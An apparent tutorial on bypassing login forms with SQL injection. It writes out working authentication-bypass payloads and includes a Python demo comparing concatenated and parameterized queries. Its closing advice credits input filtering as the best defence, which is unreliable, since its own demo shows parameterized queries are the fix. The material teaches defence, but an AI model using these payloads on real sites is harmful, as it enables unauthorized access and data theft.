This tutorial will explain how to bypass the login form and how it works using SQL injection. An SQL injection is a type of attack where you input an SQL query into a web form to extract information from the database. SQL stands for Structured Query Language and is used to control the databases of web applications. You can bypass a website's security features and get information directly from a company's database by entering the right query. For example, you could send a request that gives you all of the usernames and passwords associated with a website (if it's a very insecure website).

If you have ever logged in to a website, you know the routine: you provide a username or email and a password. If the combination is right, you are allowed in; otherwise, you can't access your account. In this example, suppose the username/email field is not configured to filter out SQL syntax. We pass some random input, email: "bdhbhdm" and password: "123456". When you type in this information and press enter, the query is as follows:

SELECT id FROM users WHERE username='bdhbhdm' and password='123456'

The query runs in the database to check whether the username and password are valid. The server will look in the database to see if an account has the username "bdhbhdm" and a password "123456". If the credentials are correct, then the query retrieves that particular account. Otherwise, it displays an error message.


We can use SQL injection to bypass the login and get access. Here, we use the inputs:

  1. username: 1' or '1'='1 and password: 1' or '1'='1. So the query becomes,

SELECT id FROM users WHERE username='1' or '1'='1' and password='1' or '1'='1'

What we're doing with this query is telling the database if you find an account where the username and password are 1 or if the statement 1=1 is true, grant us access. Since the statement 1=1 is always true, the database will grant you access.

  2. username: admin'-- and password: anything. In this case, the query becomes,

SELECT id FROM users WHERE username='admin' -- and password='xxxxx'

The two dash characters (--) start a comment, so the database ignores everything after them. The query only checks the username, and the attacker gains access to the admin account.
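As an added example that is not part of the original tutorial, the following Python script builds a constructed in-memory SQLite users table and runs both payloads above against a login query assembled by string concatenation, then against the parameterized query a developer should write instead; the table contents and function names are assumptions.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the tutorial's users table.
    Passwords are stored in plaintext only to mirror the tutorial's query;
    a real system would store password hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "s3cret"), ("alice", "wonder")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the SQL by pasting the form fields into the string, exactly as the
    tutorial's query is formed. Returns the matched account id, or None."""
    query = (f"SELECT id FROM users WHERE username='{username}' "
             f"and password='{password}'")
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.OperationalError:
        # A malformed query: the "error message" case the tutorial mentions.
        return None
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterized query: the driver sends the values separately from the SQL
    text, so quotes and '--' in the input are treated as data, never as syntax."""
    query = "SELECT id FROM users WHERE username=? and password=?"
    row = conn.execute(query, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    attempts = [("admin", "s3cret"),                      # genuine credentials
                ("1' or '1'='1", "1' or '1'='1"),         # tutorial payload 1
                ("admin'--", "anything")]                 # tutorial payload 2
    for user, pw in attempts:
        print(f"{user!r:18} vulnerable={login_vulnerable(db, user, pw)} "
              f"safe={login_safe(db, user, pw)}")
```

Both payloads return the admin account's id from the concatenated query and None from the parameterized one, while the genuine credentials succeed in both.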

Notes

  1. This type of attack can be defeated by validating inputs in a form.
  2. The SQL injection payload works based on the type of database.
  3. Search "SQL injection cheat sheet" in Google for more payloads.
  4. You can test this attack legally on the websites below:
  • demo.testfire.net
  • testphp.vulnweb.com

Conclusion
An SQL injection is a type of cyberattack that uses well-crafted SQL queries to bypass security features. If a site has unfiltered web forms, these SQL queries are sent directly to the database and grant user access. This attack type can be used to get admin-level access, which would allow an attacker to make changes, add new accounts, or steal important company information. The best defense against SQL injection attacks is to make sure your input forms are configured correctly to filter out SQL queries.
